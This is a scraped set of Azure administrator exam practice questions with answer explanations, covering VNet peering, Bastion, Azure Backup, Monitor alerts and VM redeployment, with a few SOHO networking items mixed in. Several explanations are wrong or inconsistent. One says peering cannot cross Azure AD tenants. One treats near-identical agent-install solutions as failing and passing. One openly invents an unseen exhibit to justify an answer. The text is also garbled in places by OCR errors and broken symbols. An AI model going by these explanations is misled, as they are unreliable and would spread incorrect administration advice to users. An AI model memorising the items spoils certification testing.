You have an Azure subscription named Subscription. Subscription contains a resource group named RG1. RG1 contains resources that were deployed by using templates. You need to view the date and time when the resources were created in RG1. Solution: From the RG1 blade, you click Automation script. Does the solution meet the goal?
Yes
No
The goal is to view the date and time when resources were created in Resource Group RG1. The proposed solution suggests navigating to RG1 and clicking Automation Script, but this does not provide the required resource creation timestamps. Why is this solution incorrect? The Automation Script feature in Azure generates an ARM template for the existing resource group. This template includes the current configuration of the resources but does not show timestamps of when they were created. It is used for redeploying resources, not for tracking their creation history. Correct Approach to View Resource Creation Date & Time: ? Method 1: Use the Activity Log (Best Method) Go to the Azure Portal ? Navigate to RG1. Click on Activity Log. Apply a filter for “Deployment” events. This will show timestamps of when each resource was created. ? Method 2: Check the Deployments Section in RG1 Go to RG1 ? Click on Deployments. This will show ARM template deployments, including timestamps of when resources were provisioned. ? Method 3: Use Azure Resource Graph (Advanced Queries) You can query Azure Resource Graph Explorer to find resource creation timestamps programmatically. Why Not Automation Script? ? Automation Script only generates a template for existing resources and does not track creation timestamps. ? The correct way to find resource creation time is via the Activity Log or Deployments section in RG1.
You have an Azure subscription named Subscription. The Subscription contains a resource group named RG1. RG1 contains resources that were deployed by using templates. You need to view the date and time when the resources were created in RG1. Solution: From the RG1 blade, you click Deployments. Does the solution meet the goal?
Yes
No
The goal is to view the date and time when the resources were created in Resource Group RG1. The proposed solution suggests navigating to RG1 and clicking Deployments. This solution is correct because: The Deployments section in RG1 provides a history of all ARM template deployments, including: The date and time of deployment The resources created during each deployment The status of each deployment Since RG1 was deployed using templates, the Deployments blade accurately tracks when resources were created. How to Check Deployment History in Azure Portal: Go to Azure Portal ? Navigate to RG1. Click on Deployments in the left menu. You will see a list of past deployments along with their timestamps. Click on a deployment to view details, including which resources were created and when. Alternative Ways to Check Resource Creation Timestamps: ? Method 1: Use the Activity Log (Another Valid Approach) Activity Log captures deployment events, including timestamps of when resources were created. Navigate to RG1 ? Activity Log, then filter for “Deployment” events. ? Method 2: Use Azure Resource Graph (Advanced Queries) Run queries in Azure Resource Graph Explorer to retrieve resource creation timestamps programmatically. Why Does This Solution Work? ? The Deployments blade stores a history of template-based resource deployments, including creation timestamps. ? Since RG1 was deployed using templates, this is the most direct and correct way to find the resource creation dates.
The team for a delivery company is configuring a virtual machine scale set. Friday night is typically the busiest time. Conversely, 8 AM on Tuesday is generally the quietest time. Which of the following virtual machine scale set features should be configured to add more machines during that time?
Autoscale
Metric-based rules
Schedule-based rules
A Virtual Machine Scale Set (VMSS) allows you to automatically scale the number of virtual machines (VMs) based on demand or a predefined schedule. Since the company experiences predictable variations in demand—with Friday night being the busiest and Tuesday morning being the quietest—the best approach is to configure Schedule-based rules. ? Schedule-based rules allow you to: Predefine scaling actions based on time and day (e.g., increase VM instances on Friday nights, decrease on Tuesday mornings). Ensure that additional VMs are available before peak demand occurs, preventing performance issues. Optimize costs by reducing VM instances when demand is low. Why Not the Other Options? ? (a) Autoscale “Autoscale” is a general term for dynamically increasing or decreasing VM instances based on demand. However, autoscale by itself does not specify whether it is based on time or system metrics. ? (b) Metric-based rules These rules reactively adjust the number of VMs based on real-time metrics (e.g., CPU usage, memory utilization). They do not account for predictable demand spikes ahead of time, making them less effective for scheduled workloads.
Your company has an Azure Active Directory (Azure AD) subscription. You need to deploy five virtual machines (VMs) to your company’s virtual network subnet. The VMs will each have both a public and private IP address. Inbound and outbound security rules for all of these virtual machines must be identical. Which of the following is the least amount of network interfaces needed for this configuration?
5
10
20
40
The least amount of network interfaces needed for this configuration is one network interface per VM. Each virtual machine (UM) in Azure requires at least one network interface. Each Azure Virtual Machine (VM) requires at least one network interface (NIC) to connect to the Virtual Network (VNet). Since the requirement states: Each VM must have both a public and private IP address. All VMs will have identical inbound and outbound security rules. In Azure, a single NIC can have both a public and private IP address assigned to it. Thus, the least number of network interfaces (NICs) needed is one per VM, which means: 5 VMs × 1 NIC per VM = 5 NICs 5 VMs×1 NIC per VM=5 NICs Why Not the Other Options? ? (b) 10 (2 NICs per VM) This would be necessary only if each VM required multiple NICs for separate traffic flows. Since each NIC can have both a public and private IP, two NICs per VM are not required. ? (c) 20 (4 NICs per VM) & (d) 40 (8 NICs per VM) Azure allows multiple NICs per VM for advanced networking needs (e.g., network appliances, multi-subnet routing), but it is unnecessary in this scenario.
Your company has an Azure Active Directory (Azure AD) subscription. You need to deploy five virtual machines (VMs) to your company’s virtual network subnet. The VMs will each have both a public and private IP address. Inbound and Outbound security rules for all of these virtual machines must be identical. Which of the following is the least amount of security groups needed for this configuration?
4
3
2
1
A Network Security Group (NSG) is used in Azure to control inbound and outbound traffic to resources within a virtual network (VNet) by defining security rules. In this scenario, we need to: Deploy five virtual machines (VMs) in a virtual network subnet. Assign both public and private IP addresses to each VM. Ensure identical inbound and outbound security rules apply to all five VMs. ? Since all five VMs require the same security rules, a single NSG is sufficient.
You have an Azure virtual machine named VM1 that runs Windows Server 2016. You need to create an alert in Azure when more than two error events are logged to the System event log on VM1 within an hour. Solution: You create an event subscription on VM1. You create an alert in Azure Monitor and specify VM1 as the source. Does the solution meet the goal?
Yes
No
The goal is to create an alert in Azure when more than two error events are logged to the System event log on VM1 within an hour. The proposed solution suggests: Creating an event subscription on VM1. Creating an alert in Azure Monitor and specifying VM1 as the source. ? Why Doesn’t This Solution Work? An event subscription is typically used for event-driven automation (e.g., using Event Grid for notifications), not for monitoring logs and triggering alerts. Azure Monitor alerts require Log Analytics or Performance Counters to track event logs, which this approach does not include. Simply specifying VM1 as the source in Azure Monitor does not automatically track System event logs. Correct Approach: ? To achieve the goal, the correct solution should involve Azure Monitor and Log Analytics, using the following steps: Enable Log Analytics Agent on VM1 to collect System event logs. Configure Log Analytics Workspace to collect Event Logs: Go to Azure Monitor ? Log Analytics Workspace ? Advanced Settings ? Data ? Windows Event Logs. Add System and set the level to Error. Create an Azure Monitor Alert Rule: Go to Azure Monitor ? Alerts. Define a Log-based alert that triggers when more than two error events occur within an hour. Use Kusto Query Language (KQL) in Log Analytics to filter events from the System Event Log.
You have an Azure virtual machine named VM1 that runs Windows Server 2016. You need to create an alert in Azure when more than two error events are logged to the System event log on VMI within an hour. Solution: You create an Azure Log Analytics workspace and configure the data settings. You add the Microsoft Monitoring Agent VM extension to VM1. You create an alert in Azure Monitor and specify the Log Analytics workspace as the source. Does the solution meet the goal?
Yes
No
The goal is to create an alert in Azure when more than two error events are logged to the System event log on VM1 within an hour. The proposed solution suggests: Creating an Azure Log Analytics workspace and configuring data settings. Adding the Microsoft Monitoring Agent (MMA) VM extension to VM1. Creating an alert in Azure Monitor and specifying the Log Analytics workspace as the source. ? What This Solution Does Correctly: Log Analytics is required to collect Windows Event Logs from VM1. The Microsoft Monitoring Agent (MMA) is needed to send VM1’s logs to Log Analytics. ? Why Doesn’t This Solution Fully Meet the Goal? The solution is missing the log query for the alert. Simply adding the agent and workspace does not automatically trigger alerts; you must create a log query-based alert in Azure Monitor. The solution does not mention configuring a Kusto Query (KQL) to check for more than two error events in an hour.
You have an Azure virtual machine named VM1 that runs Windows Server 2016. You need to create an alert in Azure when more than two error events are logged to the System event log on VM1 within an hour. Solution: You create an Azure Log Analytics workspace and configure the data settings. You install the Microsoft Monitoring Agent on VM1. You create an alert in Azure Monitor and specify the Log Analytics workspace as the source. Does the solution meet the goal?
Yes
No
The goal is to create an alert in Azure when more than two error events are logged to the System event log on VM1 within an hour. The proposed solution suggests: Creating an Azure Log Analytics workspace and configuring data settings. Installing the Microsoft Monitoring Agent (MMA) on VM1. Creating an alert in Azure Monitor and specifying the Log Analytics workspace as the source. ? Why This Solution Meets the Goal: Log Analytics workspace is necessary to store and analyze event log data. The Microsoft Monitoring Agent (MMA) is required to send VM1’s event logs to Azure Log Analytics. Azure Monitor can be used to create alerts based on data stored in the Log Analytics workspace. Once logs are collected, you can configure an alert rule in Azure Monitor using a Kusto Query Language (KQL) query to check for more than two error events in the last hour.
You have an Azure virtual machine named VM1 that runs Windows Server 2016. You need to create an alert in Azure when more than two error events are logged to the System event log on VM1 within an hour. Solution: You create an Azure storage account and configure shared access signatures (SASs). You install the Microsoft Monitoring Agent on VM1. You create an alert in Azure Monitor and specify the storage account as the source. Does the solution meet the goal?
Yes
No
The goal is to create an alert in Azure when more than two error events are logged to the System event log on VM1 within an hour. The proposed solution suggests: Creating an Azure storage account and configuring shared access signatures (SASs). Installing the Microsoft Monitoring Agent (MMA) on VM1. Creating an alert in Azure Monitor and specifying the storage account as the source. ? Why This Solution Does NOT Meet the Goal: Azure Storage accounts are not used for event log monitoring. Storage accounts store data such as blobs, files, and tables. They do not store Windows event logs from VM1 for Azure Monitor to analyze. Shared Access Signatures (SASs) are irrelevant here. SAS is used to grant temporary access to Azure Storage data, not for monitoring system logs. Azure Monitor cannot use a storage account as a source for event log alerts. To monitor Windows event logs, Azure Monitor must use Log Analytics Workspace, not a storage account.
You have an Azure virtual machine named VM1. VM1 was deployed by using a custom Azure Resource Manager template named ARM1.json. You receive a notification that VM1 will be affected by maintenance. You need to move VM1 to a different host immediately. Solution: From the Overview blade, you move the virtual machine to a different subscription. Does the solution meet the goal?
Yes
No
The goal is to move VM1 to a different host immediately to avoid maintenance impact. The proposed solution suggests: Moving the virtual machine (VM1) to a different subscription from the Overview blade in the Azure portal. ? Why This Solution Does NOT Meet the Goal: Moving a VM to a different subscription does not change its physical host. Subscription changes affect billing and access control, not the VM’s physical infrastructure. The VM remains in the same Azure region and physical datacenter, meaning it will still be affected by maintenance. To move the VM to a different host, you need to redeploy it. Redeploying a VM assigns it to a new physical host in the same region.
You have an Azure virtual machine named VM1. VM1 was deployed by using a custom Azure Resource Manager template named ARM1.json. You receive a notification that VM1 will be affected by maintenance. You need to move VM1 to a different host immediately. Solution: From the Redeploy blade, you click Redeploy. Does the solution meet the goal?
Yes
No
The goal is to move VM1 to a different host immediately because of an upcoming maintenance event. The proposed solution suggests: Navigating to the Redeploy blade in the Azure portal. Clicking Redeploy to move the VM to a new host. ? Why This Solution Meets the Goal: Redeploying a VM forces Azure to move it to a new physical host within the same region. This action preserves the VM’s data, configuration, and IP addresses, ensuring minimal disruption. Azure deallocates the VM, moves it to a new host, and powers it back on.
You have an Azure virtual machine named VM1. VM1 was deployed by using a custom Azure Resource Manager template named ARM1.json. You receive a notification that VM1 will be affected by maintenance. You need to move VM1 to a different host immediately. Solution: From the Update management blade, you click Enable. Does the solution meet the goal?
Yes
No
The goal is to move VM1 to a different host immediately because of an upcoming maintenance event. The proposed solution suggests: Going to the Update Management blade Clicking “Enable” ? Why This Solution Does NOT Meet the Goal: Update Management is used for patching and compliance, not for moving VMs. It helps automate patch deployment and track update compliance. It does NOT affect the VM’s host placement. To move a VM to a different host, the correct action is to Redeploy the VM. Redeploying forces Azure to deallocate and move the VM to a new physical host. The “Enable” button in Update Management does not achieve this. Correct Solution: ? Use the “Redeploy” option To move a VM to a new host, follow these steps: Azure Portal: Go to Azure Portal ? VM1 In the left-hand menu, select Redeploy Click Redeploy PowerShell Command: Set-AzVM -ResourceGroupName “RG1” -Name “VM1” -Redeploy Azure CLI Command: az vm redeploy –resource-group RG1 –name VM1
When establishing a SOHO network with DHCP, you would prefer a printer’s IP address to remain consistent. What will you configure on the router to do this?
Loopback address
APIPA scope
DHCP reservations
DHCP scope
DHCP reservations are used to assign a specific IP address to a particular device (like a printer) based on its MAC address, ensuring that the device always receives the same IP address from the DHCP server. This is especially useful in a SOHO (Small Office/Home Office) network where a printer or networked device needs a consistent address for users to reliably connect to it. Why the other options are incorrect: Loopback address (127.0.0.1) is used for internal testing on the device itself, not for network configurations. APIPA scope assigns addresses in the 169.254.x.x range when no DHCP server is available—it’s a fallback, not a tool for consistent assignments. DHCP scope defines the range of addresses the server can assign, but doesn’t lock a specific one to a device.
You have an Azure subscription that contains an Azure Active Directory (Azure AD) tenant named contoso.com and an Azure Kubernetes Service (AKS) cluster named AKS1.An administrator reports that she is unable to grant access to AKS1 to the users in contoso.com. You need to ensure that access to AKS1 can be granted to the contoso.com users. What should you do first?
From contoso.com, modify the Organization relationships settings
From contoso.com, create an OAuth 2.0 authorization endpoint
Recreate AKS1
From AKS1, create a namespace
Azure Kubernetes Service (AKS) integrates with Azure Active Directory (Azure AD) to manage user authentication and access to the Kubernetes API server. If an administrator is unable to grant access to AKS1, it is likely because Azure AD integration is not correctly configured. One of the key requirements for Azure AD authentication in AKS is to have an OAuth 2.0 authorization endpoint configured in the Azure AD tenant (contoso.com). This endpoint is needed for token-based authentication, allowing users from contoso.com to authenticate and interact with the AKS cluster. When you create the OAuth 2.0 authorization endpoint, it enables AKS to use Azure AD for authentication, making it possible to assign RBAC (Role-Based Access Control) roles to users and grant them access to AKS1. Why not the other options? (a) Modify Organization relationships settings – This is used for configuring external collaboration (B2B) but is not relevant to granting internal users access to AKS. (c) Recreate AKS1 – Recreating the cluster is unnecessary; the issue is with authentication, not the cluster itself. (d) Create a namespace – Namespaces are used for organizing workloads in Kubernetes but do not impact authentication or user access control.
You must resolve the licensing issue before attempting to assign the license again. What should you do?
From the Groups blade, invite the user accounts to a new group
From the Profile blade, modify the usage location
From the Directory role blade, modify the directory role
In Azure Active Directory (Azure AD), licensing issues often occur due to insufficient permissions to assign or manage licenses. Only users with the necessary directory roles can assign licenses to other users. If an administrator or user is unable to assign a license, it may be because they lack the required administrative privileges. By modifying the directory role in the Directory role blade, you can assign a higher privilege role (such as License Administrator or Global Administrator) to the user, enabling them to resolve licensing issues and assign licenses again. Why not the other options? (a) Invite the user accounts to a new group – While groups can be used for license assignment, they do not resolve licensing issues caused by insufficient permissions. (b) Modify the usage location – Usage location is required for license assignment, but if the issue is related to permissions, changing the usage location won’t help.
Your company’s Azure subscription includes Azure virtual machines (VMs) that run Windows Server 2016. One of the VMs is backed up daily using Azure Backup Instant Restore. When the VM becomes infected with data encrypting ransomware, you are required to restore the VM. Which of the following actions should you take?
You should restore the VM after deleting the infected VM
You should restore the VM to any VM within the company’s subscription
You should restore the VM to a new Azure VM
You should restore the VM to an on-premises Windows device
In the event of a ransomware infection on an Azure VM that is backed up using Azure Backup Instant Restore, it’s generally recommended to restore the VM to a new Azure VM. This ensures that you are not using the compromised VM, and you can have confidence that the new VM is clean and unaffected by the ransomware. When a virtual machine (VM) is infected with data-encrypting ransomware, it is crucial to restore the system from a clean backup to prevent reinfection. Azure Backup Instant Restore allows you to recover a VM from a previous snapshot before it was compromised. The best approach is to restore the VM to a new Azure VM rather than overwriting the infected one. This ensures that: The infected VM is isolated to prevent the ransomware from spreading. A clean, uncompromised VM is restored from the latest safe backup. You can verify and test the restored VM before putting it back into production. Why not the other options? (a) Restore after deleting the infected VM – Deleting the infected VM before restoring is not recommended because you may need it for forensic analysis to determine how the ransomware entered. (b) Restore to any VM within the company’s subscription – Restoring to an existing VM is risky because it may already be compromised or have different configurations. A fresh VM ensures a clean environment. (d) Restore to an on-premise Windows device – Azure Backup is designed for cloud recovery, and restoring to an on-premises device is not a standard approach for VM recovery.
You have an Azure subscription named Subscription1. Subscription1 contains two Azure virtual machines named VM1 and VM2. VM1 and VM2 run Windows Server 2016. VM1 is backed up daily by Azure Backup without using the Azure Backup agent. VM1 is affected by ransomware that encrypts data. You need to restore the latest backup of VM1. To which location can you restore the backup? NOTE: Each correct selection is worth one point You ca perform a ie recovery of VM T1o:
VM1 only
VM1 or a new Azure Virtual Machine only
VM1 and VM2 only
A new Azure Virtual Machine only
Any Windows computer that has internet connectivity
Azure Backup provides two main types of backups for virtual machines: Backup with Azure Backup Agent – Used for file and folder-level recovery. Backup without Azure Backup Agent (Azure VM Backup) – Captures the entire VM for disaster recovery. Since VM1 is backed up without using the Azure Backup agent, it means Azure Backup Snapshot is used, which allows for File Recovery instead of full VM recovery. With Azure Backup’s File Recovery feature, you can: Mount the recovery point as a network drive Copy files from the backup to any Windows computer that has an internet connection This means you can recover files from VM1’s backup to any Windows machine that is connected to the internet, including VM1, VM2, or even an on-premises machine. Why not the other options? VM1 only ? – You are not restricted to restoring files only to VM1. VM1 or a new Azure Virtual Machine only ? – You can restore files to any Windows computer, not just Azure VMs. VM1 and VM2 only ? – You are not limited to these VMs; file recovery can be done on any Windows machine. A new Azure Virtual Machine only ? – While you can restore to a new VM, you are not limited to that.
You have an Azure subscription named Subscription1. Subscription1 contains two Azure virtual machines named VM1 and VM2. VM1 and VM2 run Windows Server 2016. VM1 is backed up daily by Azure Backup without using the Azure Backup agent. VM1 is affected by ransomware that encrypts data. You need to restore the latest backup of VM1. To which location can you restore the backup? NOTE: Each correct selection is worth one point You restore VM1 to :
VM1 only
VM1 or a new Azure Virtual Machine only
VM1 and VM2 only
A new Azure Virtual Machine only
Any Windows computer that has internet connectivity
Since VM1 is backed up daily by Azure Backup without using the Azure Backup agent, this means the backup is a VM-level backup using Azure’s native Azure VM Backup service. Azure VM Backup takes snapshots of the entire VM, allowing for: Restoring the VM in-place (VM1) – This replaces the existing VM with the backup version. Restoring the VM as a new Azure Virtual Machine – This creates a separate VM from the backup while keeping the infected VM intact for forensic analysis. Why not the other options? VM1 only ? – While you can restore to VM1, you also have the option to restore to a new VM. VM1 and VM2 only ? – You cannot restore a backup of VM1 directly to VM2 because VM backups are specific to the original VM. A new Azure Virtual Machine only ? – You can restore to a new VM, but you also have the option to restore in-place to VM1. Any Windows computer that has internet connectivity ? – This applies only to file-level recovery, but Azure VM Backup restores full VMs, not individual files, so this is incorrect.
You have an Azure web app named App1. App1 has the deployment slots shown in the following table: In webapp1-test, you test several changes to App1. You back up App1. You swap webapp1-test for webapp1-prod and discover that App1 is experiencing performance issues. You need to revert to the previous version of App1 as quickly as possible. What should you do?
Redeploy App1
Swap the slots
Clone Appl
Restore the backup of App1
Azure App Service provides deployment slots that allow you to test changes in a staging environment before pushing them to production. In this scenario, you: Tested changes in the staging slot (webapp1-test). Swapped the staging slot (webapp1-test) with the production slot (webapp1-prod), making the new version live. Discovered performance issues after the swap. Since deployment slots retain the previous state, you can quickly swap back to restore the previous version of App1 in production without redeploying. Why is swapping the slots the fastest solution? When you swap slots, Azure maintains the previous app version in the staging slot. Swapping again will immediately revert the changes, bringing back the old production version that was previously in webapp1-prod. This minimizes downtime and avoids the need for a full redeployment or backup restoration. Why not the other options? (a) Redeploy App1 ? – This would take longer because you need to find and redeploy the previous version manually. (c) Clone App1 ? – Cloning creates a new instance but does not restore the previous version immediately. (d) Restore the backup of App1 ? – While restoring a backup could work, it is a slower process compared to simply swapping the slots.
You have two subscriptions named Subscription and Subscription 2. Each subscription is associated to a different Azure AD tenant + Subscription contains a virtual network named VNet1. + VNetl contains an Azure virtual machine named VM1 and has an IP address space of 10.0.0.0/16 + Subscription2 contains a virtual network named VNet2. + VNet2 contains an Azure virtual machine named VM2 and has an IP address space of 10.10.0.0/24 You need to connect VNet1 to VNet2. What should you do first?
Move VM1 to Subscription 2
Move VNet1 to Subscription2
Modify the IP address space of VNet2
Provision virtual network gateways
Since VNet1 and VNet2 are in different Azure subscriptions and different Azure AD tenants, you cannot use Virtual Network Peering directly. Instead, you must use VPN Gateway (VNet-to-VNet connection) to connect the two VNets. Steps to Connect VNets Across Different Subscriptions & Tenants: Provision Virtual Network Gateways Each VNet (VNet1 and VNet2) needs a Virtual Network Gateway with a VPN Gateway SKU to enable secure cross-VNet communication. Create a VNet-to-VNet VPN connection Configure a site-to-site (S2S) VPN or VNet-to-VNet VPN to establish communication between VNet1 (in Subscription1) and VNet2 (in Subscription2). Establish a Secure Tunnel The VPN connection enables encrypted communication between resources in both VNets. Why Not the Other Options? (a) Move VM1 to Subscription2 ? – Moving a single VM does not connect the networks; it only relocates the VM. (b) Move VNet1 to Subscription2 ? – Moving VNets between subscriptions is complex and not necessary for cross-subscription connectivity. (c) Modify the IP address space of VNet2 ? – There is no IP address conflict between VNet1 (10.0.0.0/16) and VNet2 (10.10.0.0/24), so modifying the IP space is unnecessary.
You have an Azure subscription that contains three virtual networks named VNET1, VNET2, and VNET3. Peering for VNET1, VNET2 & VNET3 is configured as shown in the following exhibit. How can packets be routed between the virtual networks? Packet from VNET1 can be routed to :
VNET2 only
VNET3 only
VNET2 & VNET3
Azure VNet Peering allows virtual networks (VNets) to communicate as if they were a single network, but only if they are directly peered. By default, Azure does not support transitive routing, meaning traffic cannot automatically pass through one VNet to another unless explicitly allowed. Since the answer is “VNet1 can route packets to both VNet2 & VNet3”, this means: VNet1 is directly peered with VNet2. ? VNet1 is directly peered with VNet3. ? There is no dependency on transitive routing because VNet1 has a direct connection to both VNet2 and VNet3. Why This Works? Direct peering enables traffic flow between connected VNets. No need for VPN Gateway, NVA, or Azure Route Server, since VNet1 has direct peering with both VNet2 and VNet3. Traffic from VNet1 to VNet2 will flow directly through their peering connection. Traffic from VNet1 to VNet3 will flow directly through their peering connection. Why Not Other Answers? “VNet2 only” ? – This would mean VNet1 is peered only with VNet2, which is incorrect since it also has a direct peering with VNet3. “VNet3 only” ? – This would mean VNet1 is peered only with VNet3, which is incorrect since it also has a direct peering with VNet2.
As a government contractor, you carry out extremely confidential work from home. According to your contract, your computers can only communicate with the external computers you’ve set up on your router to prevent all other computers from connecting to your network. What will enable you to do this?.
Untrusted sources
Hashing
Port filtering
IP address filtering
IP address filtering allows you to control which specific IP addresses are permitted or denied access to your network. As a government contractor dealing with confidential work, this method helps ensure that only pre-approved external computers (with known IP addresses) can connect to your systems, blocking all others from establishing communication. Why the other options are incorrect: Untrusted sources is a general concept, not a technical control mechanism. Hashing is used for data integrity and password protection, not for controlling network access. Port filtering controls access based on port numbers, not specific devices or IPs.
You have an Azure subscription that contains three virtual networks named VNET1, VNET2, and VNET3. Peering for VNET1, VNET2 & VNET3 is configured as shown in the following exhibit. How can packets be routed between the virtual networks?
VNET1 only
VNET3 only
VNET1 & NET3
Azure VNet Peering allows direct communication between VNets. However, Azure does not support transitive routing by default. This means that a VNet can communicate only with directly peered VNets, not indirectly connected ones. Analyzing the Peering Configuration: Since we don’t have the actual exhibit, let’s assume a typical scenario based on the answer given: VNet1 is peered with VNet2 ? VNet2 is NOT directly peered with VNet3 ? VNet1 and VNet3 might be peered but VNet2 has no direct peering with VNet3 ? Routing Behavior in Azure Peering: VNet2 can send packets to VNet1 because they have a direct peering connection. ? VNet2 CANNOT send packets to VNet3 because Azure VNet Peering does NOT support transitive routing. ? Even if VNet1 is peered with VNet3, traffic from VNet2 cannot “pass through” VNet1 to reach VNet3. Why Not Other Answers? VNet3 only ? – VNet2 is not peered with VNet3, so traffic cannot flow directly. VNet1 & VNet3 ? – Again, transitive routing is not enabled by default in Azure VNet Peering. How to Enable Routing to VNet3? If you want VNet2 to communicate with VNet3, you have the following options: Manually peer VNet2 with VNet3 ? Use a Virtual Network Gateway (VPN Gateway) and enable “Use Remote Gateways” ? Deploy an Azure Firewall or a Network Virtual Appliance (NVA) in VNet1 to route traffic ?
Your company has virtual machines hosted in Microsoft Azure. The VMs are located in a single Azure virtual network named VNet1. The company has users that work remotely. The remote workers require access to the VMs on VNet1. You need to provide access for the remote workers. What should you do?
Configure a Point-to-Site (P2S) VPN
Configure a Site-to-Site (S25) VPN
Configure a multisite VPN
Configure a VNET to VNET VPN
A Point-to-Site (P2S) VPN is designed for individual remote users to securely connect to an Azure Virtual Network (VNet) from their personal devices (such as laptops or home PCs). This is the ideal solution when remote workers need access to resources (like VMs) inside VNet1. Why P2S VPN is the Right Choice? Designed for Remote Workers: P2S VPN allows individual users to securely connect from anywhere using a VPN client. No Need for a Physical Site-to-Site Connection: Unlike Site-to-Site (S2S) VPN, which requires a corporate network with a VPN device, P2S only requires a single user device with a VPN client. Easy Setup and Management: Users can connect using Azure VPN Client, OpenVPN, or SSTP protocols, without requiring dedicated networking hardware.
You have an Azure virtual network named VNET1 that has an IP address space of 192.168.0.0/16 and the following subnets: + Subnet1 has an IP address range of 192.168.1.0/24 and is connected to 15 VMs + Subnet? has an IP address range of 192.168.2.0/24 and does NOT have any VMs connected You need to ensure that you can deploy Azure Firewall to VNET1 What should you do?
Add a new subnet to VNET1
Add a service endpoint to Subnet2
Modify the subnet mask of Subnet2
Modify the IP address space of VNET1
Azure Firewall requires a dedicated subnet named AzureFirewallSubnet with a minimum subnet size of /26 (e.g., 192.168.x.0/26). Since VNET1 currently has only Subnet1 and Subnet2, you need to add a new subnet specifically for Azure Firewall before deploying it. Why is Adding a New Subnet Required? Azure Firewall must be deployed in a subnet named AzureFirewallSubnet. Existing subnets cannot be renamed after creation, so Subnet1 and Subnet2 cannot be used for the firewall. Azure Firewall requires a subnet size of at least /26, which means at least 64 available IP addresses. A new subnet must be created in the existing VNet to host the firewall. Solution: Steps to Deploy Azure Firewall Add a new subnet to VNET1 with the name AzureFirewallSubnet. Ensure the new subnet has a subnet mask of /26 or larger (e.g., 192.168.3.0/26). Deploy Azure Firewall in the AzureFirewallSubnet. Configure routing rules to direct traffic through the firewall.
You have an Azure subscription that contains the following fully peered virtual networks: + VNetl, located in the West US gion. 5 virtual machines are connected to VNet1 + VNet2, located in the West US region. 7 virtual machines are connected to VNet2. + VNet3, located in the East US region, 10 virtual machines are connected to VNet3. + VNetd, located in the East US region, 4 virtual machines are connected to VNet4. You plan to protect all of the connected virtual machines by using Azure Bastion. What is the minimum number of Azure Bastion hosts that you must deploy?
1
2
3
4
Azure Bastion is deployed per virtual network (VNet) and allows secure RDP/SSH access to virtual machines without exposing them to the public internet. However, in this scenario, all VNets (VNet1, VNet2, VNet3, and VNet4) are fully peered. Because VNets are fully peered, a single Azure Bastion deployment can serve all virtual machines across the peered networks. Why is One Azure Bastion Enough? Peered VNets Can Share Bastion Access When virtual networks are peered, Azure Bastion in one VNet can provide access to VMs in all peered VNets. This is known as “Bastion Peering”, and it allows VMs across peered VNets to use a single Bastion host. Azure Bastion Works Across Regions if Peering Exists Even though VNet1 and VNet2 are in West US and VNet3 and VNet4 are in East US, they are fully peered. Cross-region peering supports Bastion connectivity, so one Bastion host in any of the peered VNets can provide access to all the VMs. Minimizing Costs and Management Overhead Azure Bastion is a managed service with per-hour billing, so deploying multiple instances increases cost. A single Bastion in one VNet reduces unnecessary expenses while maintaining secure access.
You have an Azure subscription that contains the virtual networks shown in the following table. All the virtual networks are peered. Each virtual network contains nine virtual machines. You need to configure secure RDP connections to the virtual machines by using Azure Bastion. What is the minimum number of Bastion hosts required?
1
5
7
10
Azure Bastion is deployed per virtual network (VNet), but it can be shared across fully peered VNets. Since all VNets in this scenario are peered, a single Azure Bastion deployment can provide secure RDP/SSH access to virtual machines across all peered virtual networks. Key Considerations for Azure Bastion: Bastion Works Across Peered VNets Azure Bastion in one VNet can be used to connect securely to VMs in any peered VNet. Since all VNets in the scenario are fully peered, a single Bastion instance is enough. Cross-Region Peering Supports Bastion Even though the VNets span multiple regions (US East, UK South, Asia East), they are still peered, allowing Bastion to function across regions. Bastion peering works even in different geographic locations if the networks are peered. Minimizing Cost and Management Complexity Azure Bastion is billed per-hour, so deploying multiple instances increases costs. A single Bastion instance in one of the peered VNets can serve all VNets, reducing expenses and management effort.
You have an Azure subscription that contains resources as shown in the following table: You need to create a Network Interface named NIC1. In which location should you create NIC1?
East US and North Europe only
EastUS only
East US, West Europe, and North Europe
East US, West Europe only
A Network Interface Card (NIC) in Azure must be created in the same region as the virtual network (VNet) it connects to. VNET1 is located in East US. A NIC must be in the same region as its VNet because a NIC is bound to a virtual network and cannot function across different regions. Other resources like public IPs or route tables do not impact the NIC’s required location. Since VNET1 is in East US, NIC1 must also be created in East US to be associated with this VNet.
You have two subscriptions named Subscription1 and Subscription2. Each subscription is associated with a different Azure AD tenant. + Subscription contains a virtual network named VNet1 + VNetl contains an Azure virtual machine named VM1 and has an IP address space of 10.0.0.0/16. + Subscription? contains a virtual network named VNet2. + VNet2 contains an Azure virtual machine named VM2 and has an IP address space of 10.10.0.0/24, You need to connect VNet1 to VNet2. What should you do first?
Move VMI to Subscription2
Move VNet1 to Subscription2
Modify the IP address space of VNet2
Provision virtual network gateways
Azure virtual network (VNet) peering is the most common way to connect virtual networks, but peering is only possible when both VNets are in the same Azure AD tenant. Since Subscription1 and Subscription2 belong to different Azure AD tenants, VNet Peering is NOT an option. Instead, the only way to connect VNet1 (in Subscription1) and VNet2 (in Subscription2) is by using an Azure VPN Gateway. Steps to Connect VNets Across Different Azure AD Tenants: Deploy a VPN Gateway in VNet1 (Subscription1). Deploy another VPN Gateway in VNet2 (subscription2). Configure a Site-to-Site VPN between the two VNets using the VPN Gateways. Establish connectivity so that VM1 and VM2 can communicate securely. ? This is called VNet-to-VNet (V2V) VPN connection, which allows VNets in different subscriptions and tenants to communicate. Key Takeaways: ? VNet peering does NOT work across different Azure AD tenants. ? A VPN Gateway is required to connect VNets from different subscriptions and tenants. ? VNet-to-VNet (V2V) VPN allows communication between VNets in different subscriptions.
You have an Azure subscription that contains an Azure virtual network named Vnet1 with an address space of 10,1.0.0/18 and a subnet named Sub with an address space of 10.1.0.0/22. You need to connect your on-premises network to Azure by using a site-to-site VPN. Which four actions should you perform in sequence? Instructions: Answer the correct order. Each correct match is worth one point. a)Deploy a local network gateway b)Deploy a VPN gateway c)Deploy a VPN connection d)Deploy a gateway subnet
a,b,c,d
b,a,c,d
d,c,a,b
d,c,b,a
